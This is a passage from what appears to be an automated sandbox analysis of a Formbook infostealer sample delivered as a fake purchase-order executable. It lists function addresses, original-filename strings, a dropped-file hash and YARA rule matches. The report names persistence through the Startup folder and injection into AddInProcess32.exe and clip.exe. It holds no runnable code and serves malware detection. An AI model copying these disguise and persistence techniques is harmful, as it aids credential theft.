                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE365217_2_0CDE3652
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE123817_2_0CDE1238
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0CDE3FF117_2_0CDE3FF1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 17_2_0710000717_2_07100007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0041820318_2_00418203
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_004010D718_2_004010D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_004010E018_2_004010E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0040319018_2_00403190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0040FAB318_2_0040FAB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_004163E318_2_004163E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0040445F18_2_0040445F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0040FCD318_2_0040FCD3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0040DD5318_2_0040DD53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_004026D018_2_004026D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0042E75318_2_0042E753
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0040DF2B18_2_0040DF2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E010E18_2_015E010E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015CE07618_2_015CE076
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015100A018_2_015100A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152E31018_2_0152E310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_014E224518_2_014E2245
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015EA52618_2_015EA526
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152044518_2_01520445
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D675718_2_015D6757
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152276018_2_01522760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152A76018_2_0152A760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154467018_2_01544670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153C60018_2_0153C600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DA6C018_2_015DA6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151C6E018_2_0151C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152068018_2_01520680
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151E9A018_2_0151E9A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DE9A618_2_015DE9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150686818_2_01506868
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154E81018_2_0154E810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C083518_2_015C0835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015228C018_2_015228C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153688218_2_01536882
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01520B1018_2_01520B10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01594BC018_2_01594BC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DEA5B18_2_015DEA5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DCA1318_2_015DCA13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01520D6918_2_01520D69
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151AD0018_2_0151AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01532DB018_2_01532DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015CEC4C18_2_015CEC4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D6C6918_2_015D6C69
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DEC6018_2_015DEC60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01510C1218_2_01510C12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152AC2018_2_0152AC20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159EC2018_2_0159EC20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01538CDF18_2_01538CDF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015EACEB18_2_015EACEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152CF0018_2_0152CF00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01526FE018_2_01526FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DEFBF18_2_015DEFBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01540E5018_2_01540E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01562E4818_2_01562E48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015C0E6D18_2_015C0E6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01512EE818_2_01512EE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D0EAD18_2_015D0EAD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0156717A18_2_0156717A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150F11318_2_0150F113
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015BD13018_2_015BD130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015251C018_2_015251C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153B1E018_2_0153B1E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152B0D018_2_0152B0D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D70F118_2_015D70F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0155508C18_2_0155508C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DF33018_2_015DF330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151138018_2_01511380
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D124C18_2_015D124C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150D2EC18_2_0150D2EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DF5C918_2_015DF5C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D75C618_2_015D75C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B549018_2_015B5490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158D48018_2_0158D480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015CD64618_2_015CD646
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015BD62C18_2_015BD62C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DF6F618_2_015DF6F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015936EC18_2_015936EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015659C018_2_015659C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_014E99E818_2_014E99E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152987018_2_01529870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153B87018_2_0153B870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159587018_2_01595870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DF87218_2_015DF872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152380018_2_01523800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D18DA18_2_015D18DA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D78F318_2_015D78F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015998B218_2_015998B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0155DB1918_2_0155DB19
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DFB2E18_2_015DFB2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B1B8018_2_015B1B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DFA8918_2_015DFA89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153FAA018_2_0153FAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D7D4C18_2_015D7D4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DFD2718_2_015DFD27
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01529DD018_2_01529DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015BFDF418_2_015BFDF4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01523C6018_2_01523C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015A7CE818_2_015A7CE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153FCE018_2_0153FCE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B9C9818_2_015B9C98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159FF4018_2_0159FF40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DFF6318_2_015DFF63
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D1FC618_2_015D1FC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D9ED218_2_015D9ED2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01521EB218_2_01521EB2
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE044524_2_04DE0445
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04EAA52624_2_04EAA526
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9A6C024_2_04E9A6C0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DDC6E024_2_04DDC6E0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE068024_2_04DE0680
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E0467024_2_04E04670
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DFC60024_2_04DFC600
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9675724_2_04E96757
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DEA76024_2_04DEA760
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE276024_2_04DE2760
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DD00A024_2_04DD00A0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E8E07624_2_04E8E076
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04EA010E24_2_04EA010E
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DEE31024_2_04DEE310
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DF8CDF24_2_04DF8CDF
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04EAACEB24_2_04EAACEB
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E96C6924_2_04E96C69
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9EC6024_2_04E9EC60
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E8EC4C24_2_04E8EC4C
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E5EC2024_2_04E5EC20
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DD0C1224_2_04DD0C12
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DEAC2024_2_04DEAC20
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DF2DB024_2_04DF2DB0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE0D6924_2_04DE0D69
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DDAD0024_2_04DDAD00
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DD2EE824_2_04DD2EE8
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E90EAD24_2_04E90EAD
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E80E6D24_2_04E80E6D
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E22E4824_2_04E22E48
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E00E5024_2_04E00E50
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE6FE024_2_04DE6FE0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9EFBF24_2_04E9EFBF
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DECF0024_2_04DECF00
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE28C024_2_04DE28C0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DF688224_2_04DF6882
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E7C89F24_2_04E7C89F
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DC686824_2_04DC6868
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E8083524_2_04E80835
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E0E81024_2_04E0E810
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9E9A624_2_04E9E9A6
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DDE9A024_2_04DDE9A0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9EA5B24_2_04E9EA5B
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9CA1324_2_04E9CA13
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E54BC024_2_04E54BC0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE0B1024_2_04DE0B10
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E4D48024_2_04E4D480
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E7549024_2_04E75490
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9F5C924_2_04E9F5C9
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E975C624_2_04E975C6
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E536EC24_2_04E536EC
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9F6F624_2_04E9F6F6
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E8D64624_2_04E8D646
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E7D62C24_2_04E7D62C
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E8162324_2_04E81623
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DEB0D024_2_04DEB0D0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E970F124_2_04E970F1
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E1508C24_2_04E1508C
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE51C024_2_04DE51C0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DFB1E024_2_04DFB1E0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E2717A24_2_04E2717A
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DCF11324_2_04DCF113
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E7D13024_2_04E7D130
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DCD2EC24_2_04DCD2EC
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9124C24_2_04E9124C
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DD138024_2_04DD1380
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9F33024_2_04E9F330
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E67CE824_2_04E67CE8
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DFFCE024_2_04DFFCE0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E79C9824_2_04E79C98
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE3C6024_2_04DE3C60
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE9DD024_2_04DE9DD0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E7FDF424_2_04E7FDF4
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E97D4C24_2_04E97D4C
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9FD2724_2_04E9FD27
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E99ED224_2_04E99ED2
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE1EB224_2_04DE1EB2
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E91FC624_2_04E91FC6
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9FF6324_2_04E9FF63
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E5FF4024_2_04E5FF40
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E978F324_2_04E978F3
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E918DA24_2_04E918DA
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E598B224_2_04E598B2
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E5587024_2_04E55870
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9F87224_2_04E9F872
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE987024_2_04DE9870
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DFB87024_2_04DFB870
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DE380024_2_04DE3800
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E259C024_2_04E259C0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9FA8924_2_04E9FA89
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04DFFAA024_2_04DFFAA0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E71B8024_2_04E71B80
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E9FB2E24_2_04E9FB2E
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_04E1DB1924_2_04E1DB19
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E1174024_2_02E11740
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E2B34024_2_02E2B340
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E0104C24_2_02E0104C
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E0C6A024_2_02E0C6A0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E0AB1824_2_02E0AB18
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E0C8C024_2_02E0C8C0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E0A94024_2_02E0A940
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E12FD024_2_02E12FD0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E14DF024_2_02E14DF0
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_050FE64C24_2_050FE64C
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_050FD6B824_2_050FD6B8
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_050FE19424_2_050FE194
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_050FE2BB24_2_050FE2BB
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_050FC98824_2_050FC988
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sages.exe 2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
                Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04DCB910 appears 275 times
                Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04E27BE4 appears 101 times
                Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04E15050 appears 58 times
                Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04E4E692 appears 86 times
                Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04E5EF10 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 0158E692 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 0150B910 appears 275 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 0159EF10 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 01567BE4 appears 99 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 01555050 appears 56 times
                Source: PO# 81136575.exe, 00000000.00000002.1253880543.00000000044B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1251917102.00000000035F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1272093452.0000000070CEB000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: lastOriginalFileName vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1253880543.000000000467B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1251917102.00000000032D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1253880543.00000000042D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1249957427.000000000143E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1253880543.00000000047DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1263148906.000000006FFEB000.00000020.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PO# 81136575.exe
                Source: PO# 81136575.exe, 00000000.00000002.1256723069.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs PO# 81136575.exe
                Source: 18.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
